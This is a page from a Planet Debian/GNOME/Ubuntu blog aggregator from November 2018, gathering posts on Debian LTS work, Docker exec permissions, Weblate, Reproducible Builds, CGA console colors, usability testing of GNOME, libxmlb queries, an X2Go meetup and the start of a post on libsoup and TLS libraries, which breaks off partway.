
Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2018

Planet Ubuntu - Thu, 15/11/2018 - 3:36pm

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).

Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took a break from this work.

Holger Levsen is stepping down as an LTS contributor but is taking over the role of LTS coordinator, which until now was solely the responsibility of Raphaël Hertzog. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors, ensuring that the work is done and that it is done well.

The number of sponsored hours increased to 212 hours per month, and we gained a new sponsor (who shall not be named since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.


docker and exec permissions

Planet Debian - Wed, 14/11/2018 - 11:53pm
# docker version|grep Version
Version:           18.03.1-ce
Version:           18.03.1-ce
# cat Dockerfile
FROM alpine
RUN addgroup service && adduser -S service -G service
COPY --chown=root:root debug.sh /opt/debug.sh
RUN chmod 544 /opt/debug.sh
USER service
ENTRYPOINT ["/opt/debug.sh"]
# cat debug.sh
#!/bin/sh
ls -l /opt/debug.sh
whoami
# docker build -t foobar:latest .; docker run foobar
Sending build context to Docker daemon 5.12kB
[...]
Successfully built 41c8b99a6371
Successfully tagged foobar:latest
-r-xr--r-- 1 root root 37 Nov 14 22:42 /opt/debug.sh
service
# docker version|grep Version
Version:           18.09.0
Version:           18.09.0
# docker run foobar
standard_init_linux.go:190: exec user process caused "permission denied"

That changed with 18.06 and just uncovered some issues. I was, well, let's say "surprised" that this ever worked at all. Other permission sets like 0700 or 644 already failed with a different error message on Docker 18.03.1.

Sven Hoexter http://sven.stormbind.net/blog/ a blog

Visiting London

Planet Debian - Wed, 14/11/2018 - 2:42pm

I'm visiting London the rest of the week (November 14th–18th) to watch match 5 and 6 of the Chess World Championship. If you're in the vicinity and want to say hi, drop me a note. :-)

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Alerts in Weblate to indicate problems with translations

Planet Debian - Wed, 14/11/2018 - 2:15pm

The upcoming Weblate 3.3 will bring a new feature called alerts. This is a single place where you will see problems in your translations. Right now it mostly covers Weblate integration issues, but it will be extended in the future with deeper translation-wide diagnostics.

This will help users better integrate Weblate into the development process by giving integration hints and highlighting problems Weblate has found in the translation. It will identify typical problems like unmerged Git repositories, parse errors in files, or duplicate translation files. You can read more about this feature in the Weblate documentation.

You can enjoy this feature on Hosted Weblate right now; it will be part of the upcoming 3.3 release.

Filed under: Debian English SUSE Weblate

Michal Čihař https://blog.cihar.com/archives/debian/ Michal Čihař's Weblog, posts tagged by Debian

Tiago Carrondo: S01E10 – Tendência livre

Planet Ubuntu - Wed, 14/11/2018 - 3:02am

This time we had a guest, Luís Costa, and we talked a lot about hardware, free hardware and, as could hardly be otherwise, about the new products from Libretrend, the brand-new Librebox. In a month full of events, the agenda got special attention, with updates on all the announced meetups and events! You know the drill: listen, subscribe and share!

Sponsorships

This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – sound recording, production, editing, mixing and mastering). Contact: thunderclawstudiosPT–at–gmail.com.

Attribution and licenses

The cover image is by richard ling on Visualhunt and is licensed as CC BY-NC-ND.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License.

This episode is licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, whose full text can be read here. We are open to licensing for other kinds of use; contact us for validation and authorization.

Reproducible Builds: Weekly report #185

Planet Debian - Tue, 13/11/2018 - 2:56pm

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates to our Jenkins-based testing framework that powers tests.reproducible-builds.org by Holger Levsen this week (see below). The most important work was done behind the scenes, outside of Git: a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources whilst the machine had a load of 60–200. This involved temporarily removing all 1,300 jobs, disabling plugins and other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing it to subprocess.run, and fixed the parsing of the “issue” selector option.

This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible-builds.org/blog/ reproducible-builds.org

Jim Hall: Why the Linux console has sixteen colors (SeaGL)

Planet GNOME - Mon, 12/11/2018 - 9:00pm
At the 2018 Seattle GNU/Linux Conference after-party, I gave a lightning talk about why the Linux console has only sixteen colors. Lightning talks are short talks on fun topics. I enjoyed giving the lightning talk, and the audience seemed into it, too. So I thought I'd share my lightning talk here. These are my slides in PNG format, with notes added:
Also, my entire presentation is under the CC-BY:
When you bring up a terminal window, or boot Linux into plain text mode, maybe you've wondered why the Linux console only has sixteen colors. No matter how awesome your graphics card, you only get these sixteen colors for text:
You can have eight background colors, and sixteen foreground colors. But why is that?
Remember that Linux is a PC operating system, so you have to go back to the early days of the IBM PC, although the rules are the same for any Unix terminal.

The origins go back to CGA, the Color/Graphics Adapter from the earlier PC-compatible computers. This was a step up from the plain monochrome displays; as the name implies, monochrome could only display black or white. CGA could display a limited range of colors.

CGA supported mixing red (R), green (G) and blue (B) colors. In its simplest form, RGB is either "on" or "off." In this case, you can mix the RGB colors in 2×2×2=8 ways. So RGB=100 is Red, and RGB=010 is Green, and RGB=001 is Blue. And you can mix colors, like RGB=011 is cyan. This simple table shows the binary and decimal representations of RGB:
To double the number of colors, CGA added an extra bit called the "intensifier" bit. With the intensifier bit set, the red, green and blue colors would be set to their maximum values. Without the intensifier bit, each RGB value would be set to a "midrange" intensity. Let's represent that intensifier bit as an extra 1 or 0 in the binary color representation, as iRGB:
That means 0100 gives "red" and 1100 (with intensifier bit set) results in "bright red." Also, 0010 is "green" and 1010 is "bright green." And 0000 is "black," but 1000 is "bright black."

Oh wait, there's a problem. "Black" and "bright black" are the same color, because there's no RGB value to intensify.

But we can solve that! CGA actually implemented a modified iRGB definition, using two intermediate values, at about one-third and two-thirds intensity. Most "normal" mode (0–7) colors used values at the two-thirds intensity. Translating from "normal" mode to "bright" mode, convert zero values to the one-third intensity, and two-thirds values to full intensity.

With that, you can represent most of the colors in the rainbow: red, yellow, green, and blue. You can sort of fake indigo and violet with the different "blue" shades.

Oops, we don't have orange! But we can fix that: CGA assigned 0110 "yellow" a one-third green value, which turned the color into orange, although most people saw it as brown.

Here's another iteration of the color table, using 0x0 to 0xF for the color range, with 0x5 and 0xA as the one-third and two-thirds intensities, respectively:
And that's how the Linux console got sixteen text colors! That's also why you'll often see "brown" labeled "yellow" in some references, because it started out as plain "yellow" before the intensifier bit. Similarly, you may also see "gray" represented as "bright black," because "gray" is really "black" with the intensifier bit set.
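
As an aside, here is a small Python sketch (my own reconstruction, not part of the original slides) that derives the sixteen colors from the iRGB bits, using 0x55 and 0xAA as the one-third and two-thirds intensities and special-casing brown:

# Reconstruct the 16 CGA text colors from their 4-bit iRGB values.
# 0x55 = one-third intensity, 0xAA = two-thirds, 0xFF = full.
def cga_color(irgb):
    i = (irgb >> 3) & 1
    r, g, b = (irgb >> 2) & 1, (irgb >> 1) & 1, irgb & 1
    # normal mode: set bits -> 0xAA; bright mode: set bits -> 0xFF, clear bits -> 0x55
    on, off = (0xFF, 0x55) if i else (0xAA, 0x00)
    rgb = [on if bit else off for bit in (r, g, b)]
    if irgb == 0b0110:  # "yellow" gets a one-third green value, making it brown
        rgb[1] = 0x55
    return "#{:02X}{:02X}{:02X}".format(*rgb)

for irgb in range(16):
    print(f"{irgb:04b} {cga_color(irgb)}")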

So let's look at the bit patterns. You have four bits for the foreground color, 0000 black to 1111 bright white:
And you have three bits for the background color, from 000 black to 111 white:
But why not four bits for the background color? That's because the final bit is reserved for a special attribute. With this attribute set, your text could blink on and off. The "Blink" bit was encoded at the end of the foreground and background bit-pattern:
That's a full byte! And that's why the Linux console has only sixteen colors; the Linux console inherits text mode colors from CGA, which encodes colors a full byte at a time.

It turns out the rules are the same for other Unix terminals, which also used eight bits to represent colors. But on other terminals, 0110 really was yellow, not orange or brown.

Jim Hall: Usability Testing in Open Source Software (SeaGL)

Planet GNOME - Mon, 12/11/2018 - 5:02pm
I recently attended the 2018 Seattle GNU/Linux Conference, where I gave a presentation about usability testing in open source software. I promised to share my presentation deck. Here are my slides in PNG format, with notes added:
Also, my entire presentation is under the CC-BY:
I've been involved in Free/open source software since 1993, but recently I developed an interest in usability testing in open source software. During a usability testing class in my Master's program in Scientific and Technical Communication (MS) I studied the usability of GNOME and Firefox. Later, I did a deeper examination of the usability of open source software, focusing on GNOME, as part of my Master's capstone. (“Usability Themes in Open Source Software,” 2014.)

Since then, I've joined the GNOME Design Team where I help with usability testing.

I also (sometimes) teach usability at the University of Minnesota. (CSCI 4609 Processes, Programming, and Languages: Usability of Open Source Software.)
I’ve worked with others on usability testing since then. I have mentored in Outreachy, formerly the Outreach Program for Women. Sanskriti, Gina, Renata, Ciarrai, and Diana were all interns in usability testing. Allan and Jakub from the GNOME Design Team co-mentored as advisers.
What do we mean when we talk about “usability”? You can find some formal definitions of usability that talk about the Learnability, Efficiency, Memorability, Errors, and Satisfaction. But I find it helps to have a “walking around” definition of usability.

A great way to summarize usability is to remember that real people are busy people, and they just need to get their stuff done. So a program will have good usability if real people can do real tasks in a realistic amount of time.

User eXperience (UX) is technically not the same as usability. Where usability is about real people doing real tasks in a reasonable amount of time, UX is more about the emotional connection or emotional response the user has when using the software.

You can test usability in different ways. I find the formal usability test and prototype test work well. You can also indirectly examine usability, such as using an expert to do a heuristic evaluation, or using questionnaires. But really, nothing can replace watching a real person trying to use your software; you will learn a lot just by observing others.
People think it's hard to do usability testing, but it's actually easy to do a usability test on your own. You don’t need a fancy usability lab or any professional experience. You just need to want to make your program easier for other people to use.

If you’re starting from scratch, you really have three steps to do a formal usability test:

1. Consider who are your users. Write this down as a short paragraph for each kind of user for your software. Make it a realistic fiction. These are your Personas. With personas, you can make design decisions that always benefit the user. “If we change __ then that will make it easier for users like Jane.” “If we add __ then that will help people like Steve.”

2. For each persona, write a brief statement about why that user might use the software to do their tasks. There are different ways that a user might use the software, but just jot down one way. This is a Use Scenario. With scenarios, you can better understand the circumstances when people use the software.

3. Now take a step back and think about the personas and scenarios. Write down some realistic tasks that real people would do with the software. Make each one stand on its own. These are scenario tasks, and they make up your actual usability test. Where you should write personas and scenarios in the third person (“__ does this…”), you should write scenario tasks in the second person (“you do this…”). Each scenario task should set up a brief context, then ask the tester to do something specific. For example:

You don’t have your glasses with you, so it’s hard to see the text on the screen. Make the text bigger so you can read it more easily.

The challenge in scenario tasks is not to accidentally give hints for what the tester should do. Avoid using the same words and phrases from menus. Don’t be too exact about what the tester should do - instead, describe the goal, and let the tester find their own path. Remember that there may be more than one way to do something.

The key in doing a usability test is to make it iterative. Do a usability test, analyze your results, then make changes to the design based on what you learned in the test. Then do another test. But how many testers do you need?
You don’t need many testers to do a usability test if you do it iteratively. Doing a usability test with five testers is enough to learn about the usability problems and make tweaks to the interface. At five testers, you’ve uncovered more than 80% of usability problems, assuming a typical tester can uncover about 31% of the issues.

But you may need more testers for other kinds of usability tests. “Only five” works well for traditional/formal usability tests. For a prototype test, you might need more testers.

But five is enough for most tests.
If every tester can uncover about 31% of usability problems, then note what happens when you have one, five, and ten testers in a usability test. You can cover 31% with one tester. With more testers, you have overlap in some areas, but you cover more ground with each tester. At five testers, that’s pretty good coverage. At ten testers, you don’t have considerably better coverage, just more overlap.

I made this sample graphic to demonstrate. The single red square covers 31% of the grey square's area (in the same way a tester can usually uncover about 31% of the usability problems, if you've designed your test well). Compare five and ten testers. You don't get significantly more coverage at ten testers than at five testers. You get some extra coverage, and more overlap, but that's a lot of extra effort for not a lot of extra value. Five is really all you need.
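
To make the arithmetic concrete, here is a quick sketch (my own, not from the talk) of the expected coverage if each tester independently uncovers about 31% of the problems:

# expected share of problems found by n independent testers,
# each uncovering about 31% of them
for n in (1, 5, 10):
    coverage = 1 - (1 - 0.31) ** n
    print(n, f"{coverage:.1%}")  # 1 -> 31.0%, 5 -> 84.4%, 10 -> 97.6%
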
Let me show you a usability test that I did. Actually, I did two of them. This was part of my work on my Master’s degree. My capstone was Usability Themes in Open Source Software. Hall, James. (2014). Usability Themes in Open Source Software. University of Minnesota.

I wrote up the results for each test as separate articles for Linux Journal: “The Usability of GNOME” (December, 2014) and “It’s about the user: Usability in open source software” (December, 2013).
I like to show results in a “heat map.” A heat map is just a convenient way to show test results. Scenario tasks are in rows and each tester is a separate column.

For each cell (a tester doing a task) I use a color to show how easy or how difficult that task was for the tester. I use this scale:

—Green if the tester easily completed the task. For example, if the tester seemed to know exactly what to do, what menu item to activate or which icon to click, you would code the task in green for that tester.

—Yellow if the tester experienced some (but not too much) difficulty in the task.

—Orange if the tester had some trouble in the task. For example, if the tester had to poke around the menus for a while to find the right option, or had to hunt through toolbars and selection lists to locate the appropriate icon, you would code the task in orange for that tester.

—Red if the tester experienced severe difficulty in completing the task.

—Black if the tester was unable to figure out how to complete the task, and gave up.

There are some “hot” rows here, which show tasks that were difficult for testers: setting the font and colors in gedit, and setting a bookmark in Nautilus. Also searching for a file in Nautilus was a bit challenging, too. So my test recommended that the GNOME Design Team focus on these four to make them easier to do.
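
If you want to produce a similar chart yourself, here is a minimal sketch (not the tooling I used, and with made-up scores) that renders such a heat map with matplotlib, using a 0–4 scale matching the colors above:

import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap

# rows are scenario tasks, columns are testers; 0 = easy ... 4 = gave up
results = [
    [0, 0, 1, 0, 2],
    [3, 2, 4, 3, 2],   # a "hot" row
    [0, 1, 0, 0, 0],
]
cmap = ListedColormap(["green", "yellow", "orange", "red", "black"])
plt.imshow(results, cmap=cmap, vmin=0, vmax=4)
plt.xticks(range(5), [f"Tester {i + 1}" for i in range(5)])
plt.yticks(range(3), [f"Task {i + 1}" for i in range(3)])
plt.show()
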
This next one is the heat map from my capstone project.

Note that I tried to do a lot here. You need to be realistic in your time. Try for about an hour (that’s what I did) but make sure your testers have enough time. The gray “o” in each cell is where we didn’t have enough time to do that task.

You can see some “hot rows” here too: setting the font in gedit, and renaming a folder in Nautilus. And changing all instances of some words in gedit, and installing a program in Software, and maybe creating two notes in Notes.
Most of the interns did a traditional usability test. So that’s what Sanskriti did here:
Sanskriti did a usability test that was similar to mine, so we could measure changes. She had a slightly different color map here, using two tones for green. But you can see a few hot rows: changing the default colors in gedit, adding photos to an album in Photos, and setting a photo as a desktop wallpaper from Photos. Also some warm rows in creating notes in Notes, and creating a new album in Photos.
Gina was from my second cycle in Outreachy, and she did another traditional usability test:
You can see some hot rows in Gina's test: bookmarking a location in Nautilus, adding a special character (checkmark) using Characters and Evince, and saving the location (bookmark) in Evince. Also some warm rows: changing years in Calendar, and saving changes in Evince. Maybe searching for a file in Nautilus.

Gina did such great work that we co-authored an article in FOSS Force: "A Usability Study of GNOME" (March, 2016).
In the next cycle of Outreachy, we had three interns: Renata, Ciarrai and Diana. Renata did a traditional usability test:
In Renata’s heat map, you can see some hot rows: creating an album in Photos, adding a new calendar in Calendar, and connecting to an online account in Calendar. And maybe deleting a photo in Photos and setting a photo as a wallpaper image in Photos. Some issues in searching for a date in Calendar, and creating an event in Calendar.

See also our article in Linux Voice Magazine: "GNOME Usability Testing" (November, 2016, Issue 32).
Ciarrai did a prototype test for a future design change to the GNOME Settings application:
In the future Settings, the Design Team thought they’d have a list of categories down the side. Clicking on a category shows you the settings for that category. Here’s a mock-up for Wi-Fi in the new Settings. You can see the list of other categories down the left side:
Remember the “only five” slide from a while back? That’s only for traditional/formal usability tests. For a prototype test, we didn’t think five was enough, so Ciarrai did ten testers.

For Ciarrai’s heat map, we used slightly different colors because the tester wasn’t actually using the software. They were pointing to a paper printout. Here, green indicates the tester knew exactly what to point to, and red indicates they pointed to the wrong one. Or for some tasks that had sub-panels, orange indicates they got to the first panel, and failed to get to the second setting.

You can see some hot rows, indicating where people didn’t know what category would have the Settings option they were looking for: Monitor colors, and Screen lock time. Also Time zone, Default email client, and maybe Bluetooth and Mute notifications.
Other open source projects have adopted the same usability test methods to examine usability. Debian did a usability test of GNOME. Here’s their test: (*original)
They had more general “goals” for testers, called “missions.” Similar to scenario tasks, the missions had a broader goal that provided some flexibility for the tester, but they were not very different from scenario tasks.

You can see some hot rows here: temporary files and change default video program in Settings, and installing/removing packages in Package Management. Also some issues in creating a bookmark in Nautilus, and adding/removing other clocks in Settings.
If you want more information, please visit my blog or email me.
I hope this helps you to do usability testing on your own programs. Usability is not hard! Anyone can do it!

Richard Hughes: More fun with libxmlb

Planet GNOME - Mon, 12/11/2018 - 4:51pm

A few days ago I cut the 0.1.4 release of libxmlb, which is significant because it includes the last three features I needed in gnome-software to achieve the same search results as appstream-glib.

The first is something most users of database libraries will be familiar with: Bound variables. The idea is you prepare a query which is parsed into opcodes, and then at a later time you assign one of the ? opcode values to an actual integer or string. This is much faster as you do not have to re-parse the predicate, and also means you avoid failing in incomprehensible ways if the user searches for nonsense like ]@attr. Borrowing from SQL, the syntax should be familiar:

g_autoptr(XbQuery) query = xb_query_new (silo, "components/component/id[text()=?]/..", &error);
xb_query_bind_str (query, 0, "gimp.desktop", &error);

The second feature makes the caller jump through some hoops, but hoops that make things faster: Indexed queries. As it might be apparent to some, libxmlb stores all the text in a big deduplicated string table after the tree structure is defined. That means if you do <component component="component">component</component> then we only store one string! When we actually set up an object to check a specific node for a predicate (for instance, text()='fubar') we actually do strcmp("fubar", "component") internally, which in most cases is very fast…

Unless you do it 10 million times…

Using indexed strings tells the XbMachine processing the predicate to first check if fubar exists in the string table, and if it doesn’t, the predicate can’t possibly match and is skipped. If it does exist, we know the integer position in the string table, and so when we compare the strings we can just check two uint32_t’s which is quite a lot faster, especially on ARM for some reason. In the case of fwupd, it is searching for a specific GUID when returning hardware results. Using an indexed query takes the per-device query time from 3.17ms to about 0.33ms – which if you have a large number of connected updatable devices makes a big difference to the user experience. As using the indexed queries can have a negative impact and requires extra code it is probably only useful in a handful of cases. In case you do need this feature, this is the code you would use:

xb_silo_query_build_index (silo, "component/id", NULL, &error); // the cdata
xb_silo_query_build_index (silo, "component", "type", &error); // the @type attr
g_autoptr(XbNode) n = xb_silo_query_first (silo, "component/id[text()=$'test.firmware']", &error);

The indexing is denoted by $'' rather than the normal pair of single quotes. If there is something more standard to denote this kind of thing, please let me know and I’ll switch to that instead.

The third feature is stemming, which means you can search for “gaming mouse” and still get results that mention games, game and Gaming. This is also how you can search for words like Kongreßstraße which matches kongressstrasse. In an ideal world stemming would be computationally free, but if we are comparing millions of records each call to libstemmer sure adds up. Adding the stem() XPath operator took a few minutes, but making it usable took up a whole weekend.

The query we wanted to run would be of the form id[text()~=stem('?')], but the stem() would be called millions of times on the very same string for each comparison. To fix this, and to make other XPath operators faster, I added an opcode rewriting optimisation pass to the XbMachine parser. This means if you call lower-case(text())==lower-case('GIMP.DESKTOP') we only call the UTF-8 strlower function N+1 times, rather than 2N times. For lower-case() the performance increase is slight, but for stem() it actually makes the feature usable in gnome-software. The opcode rewriting optimisation pass is kinda dumb in how it works (“let's try all combinations!”), but works with all of the registered methods, and makes all existing queries faster for almost free.

One common question I’ve had is if libxmlb is supposed to obsolete appstream-glib, and the answer is “it depends”. If you’re creating or building AppStream metadata, or performing any AppStream-specific validation then stick to the appstream-glib or appstream-builder libraries. If you just want to read AppStream metadata you can use either, but if you can stomach a binary blob of rewritten metadata stored somewhere, libxmlb is going to be a couple of orders of magnitude faster and use a ton less memory.

If you’re thinking of using libxmlb in your project send me an email and I’m happy to add more documentation where required. At the moment libxmlb does everything I need for fwupd and gnome-software and so apart from bugfixes I think it’s basically “done”, which should make my manager somewhat happier. Comments welcome.

Results produced while at "X2Go - The Gathering 2018" in Stuttgart

Planet Debian - Mon, 12/11/2018 - 3:25pm

Over the last weekend, I attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near the S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there; I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accommodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

Especially, a big thanks to everyone for allowing me to bring our family dog "Capichera" along to the event. While Capichera adapted quite well to this special environment on sunny Friday and Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk or interact).

For those interested and especially for our event sponsors, below you can find a list of produced results related to the gathering.

light+love
Mike

2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)
  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb-1.3.0.0 branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.
2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)
  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as first argument, so I can now also take down the autossh tunnel for SMTP (as opposed to unspecifically doing killall autossh).
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: Prepare a nearly vegan (the carrots had butter), organic Italian pasta (with salad and ciabatta bread) for the group, together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-cli: Add a check directly after authentication whether the remote server has the X2Go Server software installed; bail out with an error if not.
  • X2Go Consulting: Demo a possible approach for having X2Go in the web browser again to Martti Pikanen.
2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)
  • Debian: Port pinentry-x2go to Qt5, upload to unstable pinentry-x2go 0.7.5.9-3.
  • X2Go: Apply changes on top of pinentry-x2go 0.7.5.10 upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started
References

sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

Review: The "Trojan Room" coffee

Planet Debian - Mon, 12/11/2018 - 1:20pm

I was recently invited to give a seminar at the Cambridge University's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background, to save hackers in the building from finding the coffee machine empty, a camera was set up on the local network in 1991 using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001 what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in myself? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Michael Catanzaro: The GNOME (and WebKitGTK+) Networking Stack

Planet GNOME - Mon, 12/11/2018 - 5:52am

WebKit currently has four network backends:

  • CoreFoundation (used by macOS and iOS, and thus Safari)
  • CFNet (used by iTunes on Windows… I think only iTunes?)
  • cURL (used by most Windows applications, also PlayStation)
  • libsoup (used by WebKitGTK+ and WPE WebKit)

One guess which of those we’re going to be talking about in this post. Yeah, of course, libsoup! If you’re not familiar with libsoup, it’s the GNOME HTTP library. Why is it called libsoup? Because before it was an HTTP library, it was a SOAP library. And apparently somebody thought that when Mexican people say “soap,” it often sounds like “soup,” and also thought that this was somehow both funny and a good basis for naming a software library. You can’t make this stuff up.

Anyway, libsoup is built on top of GIO’s sockets APIs. Did you know that GIO has Object wrappers for BSD sockets? Well it does. If you fancy lower-level APIs, create a GSocket and have a field day with it. Want something a bit more convenient? Use GSocketClient to create a GSocketConnection connected to a GNetworkAddress. Pretty straightforward. Everything parallels normal BSD sockets, but the API is nice and modern and GObject, and that’s really all there is to know about it. So when you point WebKitGTK+ at an HTTP address, libsoup is using those APIs behind the scenes to handle connection establishment. (We’re glossing over details like “actually implementing HTTP” here. Trust me, libsoup does that too.)
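
To make that concrete, here is a minimal sketch (mine, not from the post) of the same GIO socket APIs driven from Python via PyGObject; the host name is just a placeholder:

import gi
gi.require_version("Gio", "2.0")
from gi.repository import Gio

# GSocketClient resolves the name and hands back a GSocketConnection
client = Gio.SocketClient.new()
conn = client.connect_to_host("example.org:80", 80, None)
conn.get_output_stream().write(b"GET / HTTP/1.1\r\nHost: example.org\r\nConnection: close\r\n\r\n", None)
print(conn.get_input_stream().read_bytes(4096, None).get_data())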

Things get more fun when you want to load an HTTPS address, since we have to add TLS to the picture, and we can’t have TLS code in GIO or GLib due to this little thing called “copyright law.” See, there are basically three major libraries used to implement TLS on Linux, and they all have problems:

  • OpenSSL is by far the most popular, but it’s, hm, shall we say technically non-spectacular. There are forks, but the forks have problems too (ask me about BoringSSL!), so forget about them. The copyright problem here is that the OpenSSL license is incompatible with the GPL. (Boring details: Red Hat waves away this problem by declaring OpenSSL a system library qualifying for the GPL’s system library exception. Debian has declared the opposite, so Red Hat’s choice doesn’t gain you anything if you care about Debian users. The OpenSSL developers are trying to relicense to the Apache license to fix this, but this process is taking forever, and the Apache license is still incompatible with GPLv2, so this would make it impossible to use GPLv2+ software except under the terms of GPLv3+. Yada yada details.) So if you are writing a library that needs to be used by GPL applications, like say GLib or libsoup or WebKit, then it would behoove you to not use OpenSSL.
  • GnuTLS is my favorite from a technical standpoint. Its license is LGPLv2+, which is unproblematic everywhere, but some of its dependencies are licensed LGPLv3+, and that’s uncomfortable for many embedded systems vendors, since LGPLv3+ contains some provisions that make it difficult to deny you your freedom to modify the LGPLv3+ software. So if you rely on embedded systems vendors to fund the development of your library, like say libsoup or WebKit, then you’re really going to want to avoid GnuTLS.
  • NSS is used by Firefox. I don’t know as much about it, because it’s not as popular. I get the impression that it’s more designed for the needs of Firefox than as a Linux system library, but it’s available, and it works, and it has no license problems.

So naturally GLib uses NSS to avoid the license issues of OpenSSL and GnuTLS, right?

